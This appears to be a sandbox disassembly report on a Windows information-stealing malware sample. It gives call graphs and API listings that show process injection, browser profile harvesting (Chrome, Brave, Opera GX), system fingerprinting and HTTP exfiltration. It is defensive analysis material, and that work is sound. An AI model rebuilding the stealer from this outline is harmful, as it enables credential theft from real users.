80017->80019 80020 404ddf InternetSetOptionA 80017->80020 80018->79979 80021 410609 3 API calls 80019->80021 80020->80019 80022 404e11 80021->80022 80023 41058d lstrcpyA 80022->80023 80024 404e1c 80023->80024 80025 4105c7 2 API calls 80024->80025 80026 404e3e 80025->80026 80027 41058d lstrcpyA 80026->80027 80028 404e49 80027->80028 80029 410609 3 API calls 80028->80029 80030 404e6a 80029->80030 80031 41058d lstrcpyA 80030->80031 80032 404e75 80031->80032 80033 410609 3 API calls 80032->80033 80034 404e97 80033->80034 80035 41058d lstrcpyA 80034->80035 80036 404ea2 80035->80036 80037 410609 3 API calls 80036->80037 80038 404ec3 80037->80038 80039 41058d lstrcpyA 80038->80039 80040 404ece 80039->80040 80041 410609 3 API calls 80040->80041 80042 404eef 80041->80042 80043 41058d lstrcpyA 80042->80043 80044 404efa 80043->80044 80045 4105c7 2 API calls 80044->80045 80046 404f19 80045->80046 80047 41058d lstrcpyA 80046->80047 80048 404f24 80047->80048 80049 410609 3 API calls 80048->80049 80050 404f45 80049->80050 80051 41058d lstrcpyA 80050->80051 80052 404f50 80051->80052 80053 410609 3 API calls 80052->80053 80054 404f71 80053->80054 80055 41058d lstrcpyA 80054->80055 80056 404f7c 80055->80056 80057 4105c7 2 API calls 80056->80057 80058 404f9e 80057->80058 80059 41058d lstrcpyA 80058->80059 80060 404fa9 80059->80060 80061 410609 3 API calls 80060->80061 80062 404fca 80061->80062 80063 41058d lstrcpyA 80062->80063 80064 404fd5 80063->80064 80065 410609 3 API calls 80064->80065 80066 404ff7 80065->80066 80067 41058d lstrcpyA 80066->80067 80068 405002 80067->80068 80069 410609 3 API calls 80068->80069 80070 405023 80069->80070 80071 41058d lstrcpyA 80070->80071 80072 40502e 80071->80072 80073 410609 3 API calls 80072->80073 80074 40504f 80073->80074 80075 41058d lstrcpyA 80074->80075 80076 40505a 80075->80076 80077 4105c7 2 API calls 80076->80077 80078 405079 80077->80078 80079 41058d lstrcpyA 80078->80079 80080 405084 80079->80080 80081 4104e7 lstrcpyA 80080->80081 80082 
40509f 80081->80082 80083 4105c7 2 API calls 80082->80083 80084 4050b6 80083->80084 80085 4105c7 2 API calls 80084->80085 80086 4050c7 80085->80086 80087 41058d lstrcpyA 80086->80087 80088 4050d2 80087->80088 80089 4050e8 lstrlenA lstrlenA HttpSendRequestA 80088->80089 80090 40515c InternetReadFile 80089->80090 80091 405176 InternetCloseHandle 80090->80091 80094 40511c 80090->80094 80092 402920 80091->80092 80092->80018 80093 410609 3 API calls 80093->80094 80094->80090 80094->80091 80094->80093 80095 41058d lstrcpyA 80094->80095 80095->80094 80097 4139e1 ExitProcess 80096->80097 80098 4139e8 strtok_s 80096->80098 80099 413b48 80098->80099 80112 413a04 80098->80112 80099->78921 80100 413b2a strtok_s 80100->80099 80100->80112 80101 413a21 StrCmpCA 80101->80100 80101->80112 80102 413a75 StrCmpCA 80102->80100 80102->80112 80103 413ab4 StrCmpCA 80103->80100 80103->80112 80104 413af4 StrCmpCA 80104->80100 80105 413b16 StrCmpCA 80105->80100 80106 413a59 StrCmpCA 80106->80100 80106->80112 80107 413ac9 StrCmpCA 80107->80100 80107->80112 80108 413a3d StrCmpCA 80108->80100 80108->80112 80109 413a9f StrCmpCA 80109->80100 80109->80112 80110 413ade StrCmpCA 80110->80100 80111 410549 2 API calls 80111->80112 80112->80100 80112->80101 80112->80102 80112->80103 80112->80104 80112->80105 80112->80106 80112->80107 80112->80108 80112->80109 80112->80110 80112->80111 80114 410519 lstrcpyA 80113->80114 80115 405f64 80114->80115 80116 404ab6 5 API calls 80115->80116 80117 405f70 80116->80117 80118 4104e7 lstrcpyA 80117->80118 80119 405f8c 80118->80119 80120 4104e7 lstrcpyA 80119->80120 80121 405f9c 80120->80121 80122 4104e7 lstrcpyA 80121->80122 80123 405fac 80122->80123 80124 4104e7 lstrcpyA 80123->80124 80125 405fbc 80124->80125 80126 4104e7 lstrcpyA 80125->80126 80127 405fcc InternetOpenA StrCmpCA 80126->80127 80128 406000 80127->80128 80129 4066ff InternetCloseHandle 80128->80129 80130 411c4a 7 API calls 80128->80130 81197 408048 CryptStringToBinaryA 80129->81197 80133 406020 
80130->80133 80134 4105c7 2 API calls 80133->80134 80136 406033 80134->80136 80135 410549 2 API calls 80138 406739 80135->80138 80137 41058d lstrcpyA 80136->80137 80140 40603e 80137->80140 80139 410609 3 API calls 80138->80139 80141 406750 80139->80141 80143 410609 3 API calls 80140->80143 80142 41058d lstrcpyA 80141->80142 80147 40675b 80142->80147 80144 40606a 80143->80144 80145 41058d lstrcpyA 80144->80145 80146 406075 80145->80146 80149 410609 3 API calls 80146->80149 80148 41d016 __setmbcp_nolock 5 API calls 80147->80148 80150 4067eb 80148->80150 80151 406096 80149->80151 80280 41343f strtok_s 80150->80280 80152 41058d lstrcpyA 80151->80152 80153 4060a1 80152->80153 80154 4105c7 2 API calls 80153->80154 80155 4060c3 80154->80155 80156 41058d lstrcpyA 80155->80156 80157 4060ce 80156->80157 80158 410609 3 API calls 80157->80158 80159 4060ef 80158->80159 80160 41058d lstrcpyA 80159->80160 80161 4060fa 80160->80161 80162 410609 3 API calls 80161->80162 80163 40611b 80162->80163 80164 41058d lstrcpyA 80163->80164 80165 406126 80164->80165 80166 410609 3 API calls 80165->80166 80167 406148 80166->80167 80168 4105c7 2 API calls 80167->80168 80169 406153 80168->80169 80170 41058d lstrcpyA 80169->80170 80171 40615e 80170->80171 80172 406174 InternetConnectA 80171->80172 80172->80129 80173 4061a2 HttpOpenRequestA 80172->80173 80174 4061e2 80173->80174 80175 4066f3 InternetCloseHandle 80173->80175 80176 406206 80174->80176 80177 4061ea InternetSetOptionA 80174->80177 80175->80129 80178 410609 3 API calls 80176->80178 80177->80176 80179 40621c 80178->80179 80180 41058d lstrcpyA 80179->80180 80181 406227 80180->80181 80182 4105c7 2 API calls 80181->80182 80183 406249 80182->80183 80184 41058d lstrcpyA 80183->80184 80185 406254 80184->80185 80186 410609 3 API calls 80185->80186 80187 406275 80186->80187 80188 41058d lstrcpyA 80187->80188 80189 406280 80188->80189 80190 410609 3 API calls 80189->80190 80191 4062a2 80190->80191 80192 41058d lstrcpyA 80191->80192 80193 4062ad 
80192->80193 80194 410609 3 API calls 80193->80194 80195 4062cf 80194->80195 80196 41058d lstrcpyA 80195->80196 80197 4062da 80196->80197 80198 410609 3 API calls 80197->80198 80199 4062fb 80198->80199 80200 41058d lstrcpyA 80199->80200 80201 406306 80200->80201 80202 4105c7 2 API calls 80201->80202 80203 406325 80202->80203 80204 41058d lstrcpyA 80203->80204 80205 406330 80204->80205 80206 410609 3 API calls 80205->80206 80207 406351 80206->80207 80208 41058d lstrcpyA 80207->80208 80209 40635c 80208->80209 80210 410609 3 API calls 80209->80210 80211 40637d 80210->80211 80212 41058d lstrcpyA 80211->80212 80213 406388 80212->80213 80214 4105c7 2 API calls 80213->80214 80215 4063aa 80214->80215 80216 41058d lstrcpyA 80215->80216 80217 4063b5 80216->80217 80218 410609 3 API calls 80217->80218 80219 4063d6 80218->80219 80220 41058d lstrcpyA 80219->80220 80221 4063e1 80220->80221 80222 410609 3 API calls 80221->80222 80223 406403 80222->80223 80224 41058d lstrcpyA 80223->80224 80225 40640e 80224->80225 80226 410609 3 API calls 80225->80226 80227 40642f 80226->80227 80228 41058d lstrcpyA 80227->80228 80229 40643a 80228->80229 80230 410609 3 API calls 80229->80230 80231 40645b 80230->80231 80232 41058d lstrcpyA 80231->80232 80233 406466 80232->80233 80234 410609 3 API calls 80233->80234 80235 406487 80234->80235 80236 41058d lstrcpyA 80235->80236 80237 406492 80236->80237 80238 410609 3 API calls 80237->80238 80239 4064b3 80238->80239 80240 41058d lstrcpyA 80239->80240 80241 4064be 80240->80241 80242 410609 3 API calls 80241->80242 80243 4064df 80242->80243 80244 41058d lstrcpyA 80243->80244 80245 4064ea 80244->80245 80246 4105c7 2 API calls 80245->80246 80247 406506 80246->80247 80248 41058d lstrcpyA 80247->80248 80249 406511 80248->80249 80250 410609 3 API calls 80249->80250 80251 406532 80250->80251 80252 41058d lstrcpyA 80251->80252 80253 40653d 80252->80253 80254 410609 3 API calls 80253->80254 80255 40655f 80254->80255 80256 41058d lstrcpyA 80255->80256 80257 40656a 
80256->80257 80258 410609 3 API calls 80257->80258 80259 40658b 80258->80259 80260 41058d lstrcpyA 80259->80260 80261 406596 80260->80261 80262 410609 3 API calls 80261->80262 80263 4065b7 80262->80263 80264 41058d lstrcpyA 80263->80264 80265 4065c2 80264->80265 80266 4105c7 2 API calls 80265->80266 80267 4065e1 80266->80267 80268 41058d lstrcpyA 80267->80268 80269 4065ec 80268->80269 80270 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 80269->80270 81195 427050 80270->81195 80272 40663e lstrlenA lstrlenA 80273 427050 _memmove 80272->80273 80274 406667 lstrlenA HttpSendRequestA 80273->80274 80275 4066d2 InternetReadFile 80274->80275 80276 4066ec InternetCloseHandle 80275->80276 80278 406692 80275->80278 80276->80175 80277 410609 3 API calls 80277->80278 80278->80275 80278->80276 80278->80277 80279 41058d lstrcpyA 80278->80279 80279->80278 80281 4134cc 80280->80281 80284 41346e 80280->80284 80281->78936 80282 410549 2 API calls 80283 4134b6 strtok_s 80282->80283 80283->80281 80283->80284 80284->80282 80284->80283 80285 410549 2 API calls 80284->80285 80285->80284 80294 413286 80286->80294 80287 413385 80287->78949 80288 413332 StrCmpCA 80288->80294 80289 410549 2 API calls 80289->80294 80290 413367 strtok_s 80290->80294 80291 413301 StrCmpCA 80291->80294 80292 4132dc StrCmpCA 80292->80294 80293 4132ab StrCmpCA 80293->80294 80294->80287 80294->80288 80294->80289 80294->80290 80294->80291 80294->80292 80294->80293 80296 4133bc 80295->80296 80297 413434 80295->80297 80298 410549 2 API calls 80296->80298 80299 4133e2 StrCmpCA 80296->80299 80300 41341a strtok_s 80296->80300 80301 410549 2 API calls 80296->80301 80297->78962 80298->80300 80299->80296 80300->80296 80300->80297 80301->80296 80303 4104e7 lstrcpyA 80302->80303 80304 413b9f 80303->80304 80305 410609 3 API calls 80304->80305 80306 413baf 80305->80306 80307 41058d lstrcpyA 80306->80307 80308 413bb7 80307->80308 80309 410609 3 API calls 80308->80309 80310 413bcf 80309->80310 80311 41058d lstrcpyA 
80310->80311 80312 413bd7 80311->80312 80313 410609 3 API calls 80312->80313 80314 413bef 80313->80314 80315 41058d lstrcpyA 80314->80315 80316 413bf7 80315->80316 80317 410609 3 API calls 80316->80317 80318 413c0f 80317->80318 80319 41058d lstrcpyA 80318->80319 80320 413c17 80319->80320 80321 410609 3 API calls 80320->80321 80322 413c2f 80321->80322 80323 41058d lstrcpyA 80322->80323 80324 413c37 80323->80324 81202 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80324->81202 80327 410609 3 API calls 80328 413c50 80327->80328 80329 41058d lstrcpyA 80328->80329 80330 413c58 80329->80330 80331 410609 3 API calls 80330->80331 80332 413c70 80331->80332 80333 41058d lstrcpyA 80332->80333 80334 413c78 80333->80334 80335 410609 3 API calls 80334->80335 80336 413c90 80335->80336 80337 41058d lstrcpyA 80336->80337 80338 413c98 80337->80338 81205 4115d4 80338->81205 80341 410609 3 API calls 80342 413cb1 80341->80342 80343 41058d lstrcpyA 80342->80343 80344 413cb9 80343->80344 80345 410609 3 API calls 80344->80345 80346 413cd1 80345->80346 80347 41058d lstrcpyA 80346->80347 80348 413cd9 80347->80348 80349 410609 3 API calls 80348->80349 80350 413cf1 80349->80350 80351 41058d lstrcpyA 80350->80351 80352 413cf9 80351->80352 80353 411684 11 API calls 80352->80353 80354 413d09 80353->80354 80355 4105c7 2 API calls 80354->80355 80356 413d16 80355->80356 80357 41058d lstrcpyA 80356->80357 80358 413d1e 80357->80358 80359 410609 3 API calls 80358->80359 80360 413d3e 80359->80360 80361 41058d lstrcpyA 80360->80361 80362 413d46 80361->80362 80363 410609 3 API calls 80362->80363 80364 413d5e 80363->80364 80365 41058d lstrcpyA 80364->80365 80366 413d66 80365->80366 80367 4109a2 19 API calls 80366->80367 80368 413d76 80367->80368 80369 4105c7 2 API calls 80368->80369 80370 413d83 80369->80370 80371 41058d lstrcpyA 80370->80371 80372 413d8b 80371->80372 80373 410609 3 API calls 80372->80373 80374 413dab 80373->80374 80375 41058d lstrcpyA 80374->80375 80376 413db3 80375->80376 80377 
410609 3 API calls 80376->80377 80378 413dcb 80377->80378 80379 41058d lstrcpyA 80378->80379 80380 413dd3 80379->80380 80381 413ddb GetCurrentProcessId 80380->80381 81213 41224a OpenProcess 80381->81213 80384 4105c7 2 API calls 80385 413df8 80384->80385 80386 41058d lstrcpyA 80385->80386 80387 413e00 80386->80387 80388 410609 3 API calls 80387->80388 80389 413e20 80388->80389 80390 41058d lstrcpyA 80389->80390 80391 413e28 80390->80391 80392 410609 3 API calls 80391->80392 80393 413e40 80392->80393 80394 41058d lstrcpyA 80393->80394 80395 413e48 80394->80395 80396 410609 3 API calls 80395->80396 80397 413e60 80396->80397 80398 41058d lstrcpyA 80397->80398 80399 413e68 80398->80399 80400 410609 3 API calls 80399->80400 80401 413e80 80400->80401 80402 41058d lstrcpyA 80401->80402 80403 413e88 80402->80403 81220 410b30 GetProcessHeap HeapAlloc 80403->81220 80406 410609 3 API calls 80407 413ea1 80406->80407 80408 41058d lstrcpyA 80407->80408 80409 413ea9 80408->80409 80410 410609 3 API calls 80409->80410 80411 413ec1 80410->80411 80412 41058d lstrcpyA 80411->80412 80413 413ec9 80412->80413 80414 410609 3 API calls 80413->80414 80415 413ee1 80414->80415 80416 41058d lstrcpyA 80415->80416 80417 413ee9 80416->80417 81226 411807 80417->81226 80420 4105c7 2 API calls 80421 413f06 80420->80421 80422 41058d lstrcpyA 80421->80422 80423 413f0e 80422->80423 80424 410609 3 API calls 80423->80424 80425 413f2e 80424->80425 80426 41058d lstrcpyA 80425->80426 80427 413f36 80426->80427 80428 410609 3 API calls 80427->80428 80429 413f4e 80428->80429 80430 41058d lstrcpyA 80429->80430 80431 413f56 80430->80431 81243 411997 80431->81243 80433 413f67 80434 4105c7 2 API calls 80433->80434 80435 413f75 80434->80435 80436 41058d lstrcpyA 80435->80436 80437 413f7d 80436->80437 80438 410609 3 API calls 80437->80438 80439 413f9d 80438->80439 80440 41058d lstrcpyA 80439->80440 80441 413fa5 80440->80441 80442 410609 3 API calls 80441->80442 80443 413fbd 80442->80443 80444 41058d lstrcpyA 
80443->80444 80445 413fc5 80444->80445 80446 410c85 3 API calls 80445->80446 80447 413fd2 80446->80447 80448 410609 3 API calls 80447->80448 80449 413fde 80448->80449 80450 41058d lstrcpyA 80449->80450 80451 413fe6 80450->80451 80452 410609 3 API calls 80451->80452 80453 413ffe 80452->80453 80454 41058d lstrcpyA 80453->80454 80455 414006 80454->80455 80456 410609 3 API calls 80455->80456 80457 41401e 80456->80457 80458 41058d lstrcpyA 80457->80458 80459 414026 80458->80459 81258 410c53 GetProcessHeap HeapAlloc GetUserNameA 80459->81258 80461 414033 80462 410609 3 API calls 80461->80462 80463 41403f 80462->80463 80464 41058d lstrcpyA 80463->80464 80465 414047 80464->80465 80466 410609 3 API calls 80465->80466 80467 41405f 80466->80467 80468 41058d lstrcpyA 80467->80468 80469 414067 80468->80469 80470 410609 3 API calls 80469->80470 80471 41407f 80470->80471 80472 41058d lstrcpyA 80471->80472 80473 414087 80472->80473 81259 411563 7 API calls 80473->81259 80476 4105c7 2 API calls 80477 4140a6 80476->80477 80478 41058d lstrcpyA 80477->80478 80479 4140ae 80478->80479 80480 410609 3 API calls 80479->80480 80481 4140ce 80480->80481 80482 41058d lstrcpyA 80481->80482 80483 4140d6 80482->80483 80484 410609 3 API calls 80483->80484 80485 4140ee 80484->80485 80486 41058d lstrcpyA 80485->80486 80487 4140f6 80486->80487 81262 410ddb 80487->81262 80490 4105c7 2 API calls 80491 414113 80490->80491 80492 41058d lstrcpyA 80491->80492 80493 41411b 80492->80493 80494 410609 3 API calls 80493->80494 80495 41413b 80494->80495 80496 41058d lstrcpyA 80495->80496 80497 414143 80496->80497 80498 410609 3 API calls 80497->80498 80499 41415b 80498->80499 80500 41058d lstrcpyA 80499->80500 80501 414163 80500->80501 80502 410cc0 9 API calls 80501->80502 80503 414170 80502->80503 80504 410609 3 API calls 80503->80504 80505 41417c 80504->80505 80506 41058d lstrcpyA 80505->80506 80507 414184 80506->80507 80508 410609 3 API calls 80507->80508 80509 41419c 80508->80509 80510 41058d lstrcpyA 
80509->80510 80511 4141a4 80510->80511 80512 410609 3 API calls 80511->80512 80513 4141bc 80512->80513 80514 41058d lstrcpyA 80513->80514 80515 4141c4 80514->80515 81274 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 80515->81274 80518 410609 3 API calls 80519 4141dd 80518->80519 80520 41058d lstrcpyA 80519->80520 80521 4141e5 80520->80521 80522 410609 3 API calls 80521->80522 80523 4141fd 80522->80523 80524 41058d lstrcpyA 80523->80524 80525 414205 80524->80525 80526 410609 3 API calls 80525->80526 80527 41421d 80526->80527 80528 41058d lstrcpyA 80527->80528 80529 414225 80528->80529 80530 410609 3 API calls 80529->80530 80531 41423d 80530->80531 80532 41058d lstrcpyA 80531->80532 80533 414245 80532->80533 81279 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 80533->81279 80536 410609 3 API calls 80537 41425e 80536->80537 80538 41058d lstrcpyA 80537->80538 80539 414266 80538->80539 80540 410609 3 API calls 80539->80540 80541 41427e 80540->80541 80542 41058d lstrcpyA 80541->80542 80543 414286 80542->80543 80544 410609 3 API calls 80543->80544 80545 41429e 80544->80545 80546 41058d lstrcpyA 80545->80546 80547 4142a6 80546->80547 81282 411007 80547->81282 80550 410609 3 API calls 80551 4142bf 80550->80551 80552 41058d lstrcpyA 80551->80552 80553 4142c7 80552->80553 80554 410609 3 API calls 80553->80554 80555 4142df 80554->80555 80556 41058d lstrcpyA 80555->80556 80557 4142e7 80556->80557 80558 410609 3 API calls 80557->80558 80559 4142ff 80558->80559 80560 41058d lstrcpyA 80559->80560 80561 414307 80560->80561 81299 410fba GetSystemInfo wsprintfA 80561->81299 80564 410609 3 API calls 80565 414320 80564->80565 80566 41058d lstrcpyA 80565->80566 80567 414328 80566->80567 80568 410609 3 API calls 80567->80568 80569 414340 80568->80569 80570 41058d lstrcpyA 80569->80570 80571 414348 80570->80571 80572 410609 3 API calls 80571->80572 80573 414360 80572->80573 80574 41058d lstrcpyA 80573->80574 80575 414368 80574->80575 81302 411119 GetProcessHeap HeapAlloc 
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                        • API String ID: 2238633743-2740034357
                                                                                                        • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                        • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                        • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                        • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

                                                                                                        APIs
                                                                                                        • wsprintfA.USER32 ref: 00414D1C
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                        • _memset.LIBCMT ref: 00414D4F
                                                                                                        • _memset.LIBCMT ref: 00414D60
                                                                                                        • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                        • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                        • wsprintfA.USER32 ref: 00414DC2
                                                                                                        • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                        • wsprintfA.USER32 ref: 00414DFF
                                                                                                        • wsprintfA.USER32 ref: 00414E16
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                        • _memset.LIBCMT ref: 00414E28
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                        • strtok_s.MSVCRT ref: 00414E82
                                                                                                        • _memset.LIBCMT ref: 00414E94
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                        • strtok_s.MSVCRT ref: 00414EC2
                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                        • strtok_s.MSVCRT ref: 00414FE7
                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                        • FindClose.KERNEL32(?), ref: 00415125
                                                                                                        Similarity
                                                                                                        • API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                        • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                        • API String ID: 2867719434-332874205
                                                                                                        • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                        • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                        • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                        • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

                                                                                                        APIs
                                                                                                          • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                          • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                          • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                          • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                        • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                        • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                        • String ID: ERROR_RUN_EXTRACTOR

                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                        • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                        • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                        • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                        • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
                                                                                                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
